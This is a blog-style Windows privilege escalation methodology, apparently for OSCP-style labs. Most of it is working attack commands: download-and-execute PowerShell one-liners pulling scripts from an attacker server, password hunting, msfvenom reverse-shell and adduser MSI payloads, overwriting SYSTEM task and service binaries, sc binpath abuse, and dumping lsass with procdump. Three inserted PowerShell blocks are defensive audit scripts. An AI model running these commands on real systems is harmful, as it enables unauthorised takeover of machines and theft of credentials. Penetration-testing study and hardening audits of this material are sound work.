Windows privilege escalation was one thing I struggled with: it was easy enough to get a shell, but what next? I am only a normal user. Where do I start, what do I look for? I guess these are the questions that come to mind when you want to escalate. Well, this is the methodology I follow for privilege escalation. Again, this is only my flow and yours may be different; follow what works best for you.
Okay, once I get my shell, I want to escalate as quickly as possible without wasting too much time, so I run the scripts, find exactly what needs to be done and exploit it. I would suggest you try out all the manual methods first before using automated scripts, or you will not know which tool gives which information. Once you know that, go for the automated scripts.
Remember each script has a different format and checks for different things, so know exactly what the scripts are doing before running them. I would suggest running wget.vbs for transferring files from Linux to Windows, as that always worked for me.
I) Automated scripts:
Script 2: https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
I never got an interactive PowerShell prompt, so I run one-liners.
One-liners for scripts 4 & 5:
These one-liners download the script from your web server and run it directly on the victim machine.
c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/PowerUp.ps1') ; Invoke-AllChecks"
c:\>powershell.exe -ExecutionPolicy Bypass -noLogo -Command "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/powerup.ps1') ; Invoke-AllChecks"
c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/Sherlock.ps1') ; Find-AllVulns"
If you have your ps1 file downloaded to the victim machine, then run it using this:
c:\>powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"
c:\>powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
I always prefer the one-liners, clean and simple, but you might lose your shell after executing them.
II) Manual enumerations:
Step 1: Analyze scripts 1, 3 & 4
I will be listing out the manual procedure down below, but for now these are the best guides I personally found to be really useful to understand what's happening under the hood.
Enumeration 1: http://www.fuzzysecurity.com/tutorials/16.html
Enumeration 2: http://hackingandsecurity.blogspot.in/2017/09/oscp-windows-priviledge-escalation.html
III) Kernel exploits:
Analyze scripts 2 and 5.
Get the exploit-db number and substitute it in step 1 to get the code and compile it on your own, or once you have the exploit-db number you can directly get the precompiled exploit by using the number in step 2.
Exploit Step1)
https://www.exploit-db.com/exploits/"Exploit-db-Number"/
Exploit Step2)
https://github.com/offensive-security/exploit-database-bin-sploits/find/master/"Exploit-db-Number"
Exploit Step 3)
So by this time either we have high privileges or we know the exact vulnerability to exploit to get them.
And that's it, we have covered almost everything, short and simple: security patches, kernel exploits, misconfigurations. The only thing we need now is the manual way to find and exploit it. Let's head on.
=============================================================================
Manual enumeration steps:
This is the long form of the manual enumeration you saw above.
Do I know my victim?
Understanding what system you are on will help you to better visualize whether your exploits will work or not, since some features are available in older versions of the OS and not in the later ones, and vice versa.
systeminfo
hostname
echo %username%
net users
netstat -ano
netsh firewall show config
schtasks /query /fo LIST /v
tasklist /SVC //links running processes to started services
Easy wins:
Search all these files for passwords. Don't miss out on easy escalations. Once you get the password it's only a matter of PsExec to give yourself admin privileges.
c:\unattended.txt
c:\sysprep.inf
c:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
Vnc.ini
ultravnc.ini
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
Services\Services.xml
ScheduledTasks\ScheduledTasks.xml
Printers\Printers.xml
Drives\Drives.xml
DataSources\DataSources.xml
You can also run pwdump and fgdump to dump out passwords.
Just an FYI before running these commands: I found these commands give a lot of output on the screen.
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
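The files listed above are deployment leftovers that should have been cleaned up after imaging. The following PowerShell is an added audit example, not code from the original post: it checks the local paths named above and reports which ones still carry credential material (an unattend `<Password><Value>`, a Group Policy Preferences `cpassword` attribute, or an INI-style `AdminPassword=` line) without printing any values, so the files can be removed or scrubbed. The path list is taken from the post; anything else on a given host is an assumption to adjust.

```powershell
# Added audit example (not from the original post): report deployment leftovers
# that still hold credential material. Values are never printed; the goal is to
# find files that should have been deleted after deployment.

$localCandidates = @(
    'C:\unattended.txt',
    'C:\sysprep.inf',
    'C:\sysprep\sysprep.xml',
    "$env:WINDIR\Panther\Unattend\Unattended.xml",
    "$env:WINDIR\Panther\Unattended.xml"
)

function Test-CredentialLeftover {
    # One record per path: does it exist, and does it still contain a password
    # (unattend <Password><Value>, GPP cpassword=, or INI (Admin)Password=)?
    param([string]$Path)
    $record = [ordered]@{ Path = $Path; Exists = $false; HasCredential = $false; Kind = '' }
    if (-not (Test-Path -LiteralPath $Path)) { return [pscustomobject]$record }
    $record.Exists = $true
    $text = Get-Content -LiteralPath $Path -Raw -ErrorAction SilentlyContinue
    if (-not $text) { return [pscustomobject]$record }

    if ($Path -match '\.xml$') {
        try {
            $xml = [xml]$text
            # Unattend.xml: AutoLogon / UserAccounts password blocks with a non-empty Value.
            # local-name() sidesteps the urn:schemas-microsoft-com:unattend namespace.
            $pw = @($xml.SelectNodes('//*[local-name()="Password"]/*[local-name()="Value"]') |
                    Where-Object { $_.InnerText.Trim() })
            if ($pw.Count -gt 0) { $record.HasCredential = $true; $record.Kind = 'unattend Password/Value' }
            # Group Policy Preferences XML (Groups.xml, Services.xml, ...): cpassword attribute.
            $cp = @($xml.SelectNodes('//*[@cpassword]') | Where-Object { $_.cpassword })
            if ($cp.Count -gt 0) { $record.HasCredential = $true; $record.Kind = 'GPP cpassword' }
        } catch {
            $record.Kind = 'unparseable xml'
        }
    } elseif ($text -match '(?im)^\s*(Admin)?Password\s*=\s*(?!\*\s*$)\S+') {
        # sysprep.inf / unattended.txt style; AdminPassword=* means "prompt", so it is skipped.
        $record.HasCredential = $true
        $record.Kind = 'INI Password='
    }
    [pscustomobject]$record
}

$localCandidates | ForEach-Object { Test-CredentialLeftover $_ } | Format-Table -AutoSize
```

Any row with HasCredential = True is a file to delete (or to strip the password block from) once deployment is finished; the same function can be pointed at a SYSVOL Preferences folder to check the GPP XML files named in the list.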
Executing commands as another user: I always prefer to run psexec.
C:\>PsExec.exe -accepteula -u adminuser -p password c:\windows\system32\net.exe localgroup administrators MyDomain\currentusername /add
C:\>runas /user:virgil cmd.exe //this will pop up a new cmd, so better run this to create a new user or put yourself in the admin group.
Restart the victim system as the registry changes need to be updated.
C:\>shutdown /r /t 1
Commands to remember:
These are important commands which you will be using quite often, since you have to find the vulnerable directory, path or file.
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
Scheduled tasks:
schtasks /query /fo LIST /v
Read the output of scheduled tasks and check the following:
Run as User: SYSTEM
If you get any running as SYSTEM, then go through that one in particular to find the "Task to Run", time and schedules.
Based on "Task to Run", check the access permissions of that folder and file.
Eg: accesschk.exe -dqv "E:\getLogs"
If it has read/write (RW) for Authenticated Users, then we can overwrite the file it's trying to run as SYSTEM with our payload.
Generate payload:
msfvenom -p windows/shell_reverse_tcp lhost='127.0.0.1' lport='1337' -f exe > /root/Desktop/evil-log.exe
copy evil-log.exe E:\getLogs\log.exe
Overwrite it. Open a listener and wait for it to run and grab a shell as SYSTEM.
You will need to take time to examine ALL the binpaths for the Windows services, scheduled tasks and startup tasks.
The below are checked by winprivesc/PowerUp, so you should get them in the PowerShell output, but you have to learn the manual methods too.
Weak file and folder permissions or misconfigured service:
1. Trusted Service Path/ unquoted service path:
If there is a service whose exe path has a space in it, then make a file.exe whose name is the first part of the path before the space, and restart the service.
Command to check the service name and path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
Make sure you have permission to edit/put files in the folders, using icacls:
C:\>icacls "C:\Program Files (x86)\<Folder name>"
C:\>cacls "C:\Programs Files\foldername"
C:\>accesschk.exe -dqv "C:\Program Files\foldername"
Start and stop the service:
C:\>sc stop <service-name>
C:\>sc start <service-name>
To restart the system: C:\>shutdown /r /t 0
2. Vulnerable Service:
a. Service binaries:
Replacing the entire exe with a malicious one, where the permissions on files and folders allow it.
cacls "C:\path\to\file.exe"
Look for weakness
What we are interested in is binaries that have been installed by the user. In the output you want to look for BUILTIN\Users:(F), or where your user/user group has (F) or (C) rights.
Example:
C:\path\to\file.exe
BUILTIN\Users:F
BUILTIN\Power Users:C
BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
That means your user has write access. So you can just rename the .exe file and then add your own malicious binary. Then restart the program and your binary will be executed instead. This can be a simple getsuid program or a reverse shell that you create with msfvenom.
Here is a POC code for getsuid.
#include <stdlib.h>
/* Runs in the service's context when the service is restarted */
int main(void)
{
    int i;
    i = system("net localgroup administrators theusername /add");
    return 0;
}
We then compile it with mingw like this:
i686-w64-mingw32-gcc winexp.c -lws2_32 -o exp.exe
Move the exploit binary in place of the original binary file.
Okay, so now that we have a malicious binary in place we need to restart the service so that it gets executed. We can do this using wmic or net the following way:
wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]
The binary should now be executed in the SYSTEM or Administrator context.
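The three filesystem checks above (a SYSTEM scheduled task whose "Task to Run" is writable, an unquoted service path, and a service binary with weak ACLs) all reduce to the same question: can a low-privileged group write to a path that a privileged process will later execute? The following PowerShell is an added audit example, not code from the original post or from PowerUp, that answers it in one pass and lists only the findings that need fixing. It assumes an English-locale Windows (group names such as `BUILTIN\Users`), the ScheduledTasks module (Windows 8 / Server 2012 or later for `Get-ScheduledTask`), and an elevated session so every ACL can be read.

```powershell
# Added audit example (not from the original post): for every scheduled task that
# runs as SYSTEM and every auto-start service, report whether a low-privileged
# group can write to the binary itself and, for unquoted service paths, to any
# directory Windows would probe before the real binary. Run elevated.

$lowPrivGroups = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
$writeMask = [System.Security.AccessControl.FileSystemRights]'Write'

function Test-LowPrivWrite {
    # True if an Allow ACE on $Path grants any write right to a low-privileged group.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $lowPrivGroups -contains $ace.IdentityReference.Value -and
            (([int]$ace.FileSystemRights -band [int]$writeMask) -ne 0)) {
            return $true
        }
    }
    return $false
}

function Get-ExecutablePath {
    # Pull the executable out of a command line: the quoted part if quoted, else the
    # text up to and including the first ".exe". Environment variables are expanded.
    param([string]$CommandLine)
    $cl = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cl -match '^"([^"]+)"') { return $matches[1] }
    if ($cl -match '^(.+?\.exe)') { return $matches[1] }
    return ($cl -split ' ')[0]
}

function Get-ProbePaths {
    # For an unquoted path with spaces, the files CreateProcess tries before the real one:
    # C:\Program Files\Some App\svc.exe -> C:\Program.exe, C:\Program Files\Some.exe
    param([string]$ExePath)
    $parts = $ExePath -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) { ($parts[0..($i - 1)] -join ' ') + '.exe' }
}

$findings = @()

# 1. Scheduled tasks running as SYSTEM: is the "Task to Run" binary writable?
foreach ($task in Get-ScheduledTask | Where-Object { $_.Principal.UserId -match 'SYSTEM|S-1-5-18' }) {
    foreach ($action in $task.Actions | Where-Object { $_.Execute }) {
        $exe = Get-ExecutablePath $action.Execute
        $findings += [pscustomobject]@{
            Kind = 'ScheduledTask'; Name = $task.TaskName; Path = $exe
            Issue = 'binary writable'; LowPrivWrite = (Test-LowPrivWrite $exe)
        }
    }
}

# 2. Auto-start services: binary writable, and unquoted-path probe directories writable.
foreach ($svc in Get-CimInstance Win32_Service | Where-Object { $_.StartMode -eq 'Auto' -and $_.PathName }) {
    $exe = Get-ExecutablePath $svc.PathName
    $findings += [pscustomobject]@{
        Kind = 'Service'; Name = $svc.Name; Path = $exe
        Issue = 'binary writable'; LowPrivWrite = (Test-LowPrivWrite $exe)
    }
    if ($svc.PathName -notmatch '^"' -and $exe -match ' ') {
        foreach ($probe in Get-ProbePaths $exe) {
            $findings += [pscustomobject]@{
                Kind = 'Service'; Name = $svc.Name; Path = $probe
                Issue = 'unquoted path, probe directory writable'
                LowPrivWrite = (Test-LowPrivWrite (Split-Path -Path $probe -Parent))
            }
        }
    }
}

# Only rows with LowPrivWrite = True need action: remove the write ACE (icacls <path> /remove:g <group>)
# and, for unquoted paths, re-register the service with the executable quoted, e.g.
#   sc.exe config <name> binPath= "\"C:\Program Files\Some App\svc.exe\" <args>"
$findings | Where-Object LowPrivWrite | Format-Table -AutoSize
```

The probe-directory check is what makes the unquoted-path case different from a plain weak-ACL check: the binary itself can be perfectly protected while `C:\` or `C:\Program Files\` is not, and the fix is to quote the path rather than to touch the binary's ACL.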
b. Windows services:
Replacing the 'binpath' property. Tool to use: accesschk.exe from Sysinternals.
There is a detailed explanation for this above.
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -qwcu "Users" *
accesschk.exe -qwcu "Everyone" *
You must get 'RW' with SERVICE_ALL_ACCESS
sc qc <service-name>
sc config <service-name> binpath= "net user virgil P@ssword123! /add"
sc config upnphost obj=".\LocalSystem" password=""
sc stop <service-name>
sc start <service-name>
sc config <service-name> binpath= "net localgroup Administrators virgil /add"
sc stop <service-name>
sc start <service-name>
This should add a new user to the Administrators group. Try it when you have the upnphost service.
This can also be used to get a reverse shell as SYSTEM.
3. Always install elevated:
If the two registry values are set to 1, we can install a malicious msi file.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Generate shell code:
msfvenom -p windows/adduser USER=virgil PASS=P@ssword123! -f msi -o exploit.msi
msfvenom -f msi-nouac -p windows/exec cmd="C:\Users\testuser\AppData\Local\Temp\Payload.exe" > exploit.msi
Run the MSI like:
msiexec /quiet /qn /i C:\Users\Virgil\Downloads\exploit.msi
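The two `reg query` commands above only tell you the raw values; the policy is effective only when both the HKLM and the HKCU value are 1. The following PowerShell is an added example, not code from the original post: it evaluates the combined state, and when the policy is on it lists recent Windows Installer events so any package installed during the exposure window can be reviewed. It assumes the MsiInstaller provider in the Application log with event IDs 1033 ("Windows Installer installed the product") and 11707 ("Installation completed successfully"); the HKCU half reflects only the user running the script.

```powershell
# Added example (not from the original post): audit AlwaysInstallElevated and,
# if it is effective, show recent MSI installs for review.

function Get-AlwaysInstallElevatedState {
    # The policy only takes effect when BOTH values are 1; a missing value counts as 0.
    $keys = @{
        HKLM = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        HKCU = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    }
    $state = [ordered]@{}
    foreach ($hive in $keys.Keys) {
        $value = (Get-ItemProperty -Path $keys[$hive] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        $state[$hive] = if ($null -eq $value) { 0 } else { [int]$value }
    }
    $state['Effective'] = ($state.HKLM -eq 1 -and $state.HKCU -eq 1)
    [pscustomobject]$state
}

function Get-RecentMsiInstalls {
    # MsiInstaller events in the Application log: 1033 and 11707 mark completed installs.
    param([int]$Days = 7)
    Get-WinEvent -FilterHashtable @{
        LogName = 'Application'; ProviderName = 'MsiInstaller'; Id = 1033, 11707
        StartTime = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, @{ n = 'User'; e = { $_.UserId } }, Message
}

$state = Get-AlwaysInstallElevatedState
$state
if ($state.Effective) {
    Write-Warning 'AlwaysInstallElevated is effective: any user-supplied MSI installs as SYSTEM.'
    # Remediation: clear both values (or set them to 0) and review installs in the exposure window.
    #   reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /f
    #   reg delete HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /f
    Get-RecentMsiInstalls | Format-Table -AutoSize -Wrap
}
```

If the values are delivered by Group Policy, clearing them locally is only temporary; the setting to change is "Always install with elevated privileges" under Windows Installer in both the Computer and the User configuration of the policy that sets it.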
DLL hijacking:
This is one method which I personally don't like doing, but still I had to. Try out DLL hijacking when you have any of these applications installed.
Hijackable applications: https://www.exploit-db.com/dll-hijacking-vulnerable-applications/
If an application loads a DLL without giving a fully qualified path, Windows will search for the DLL in a particular order and execute it if it finds it.
Fuzzysecurity is the best guide which I follow for this topic.
Admin to system:
Psexec: admin to system
c:>psexec -i -s -d cmd.exe
This will pop up a new cmd prompt, so it is better to have RDP to the system.
AT:
This is replaced by schtasks.exe in newer systems. It creates a scheduled job to be run.
>at 13:20 /interactive cmd
>net use \\targetserver /user:DOM\user pass
>net time \\targetserver
>at \\targetserver 13:20 c:\temp\evil.bat
Passwords through process dumping:
C:\>net use \\targetserver /user:DOM\user pass
C:\>copy procdump.exe \\targetserver\c$
C:\>copy procdump.bat \\targetserver\c$
C:\>procdump.exe -ma lsass %CNAME%.dmp
C:\>at \\targetserver 13:30 C:\procdump.bat
C:\>copy \\targetserver\c$\targetserver.dmp .
This was a helpful image that sums up the kernel exploits; not sure from which blog I got it, but credits to the person who made it. You can actually combine this with the kernel method I mentioned above to directly get the compiled exploits.
This was the flow I follow overall for any Windows-based privilege escalation. I suggest you make your own checklist and flow.
Miscellaneous:
One automated tool which I would recommend y'all to endeavor out is PSAttack.
Credits @snadar73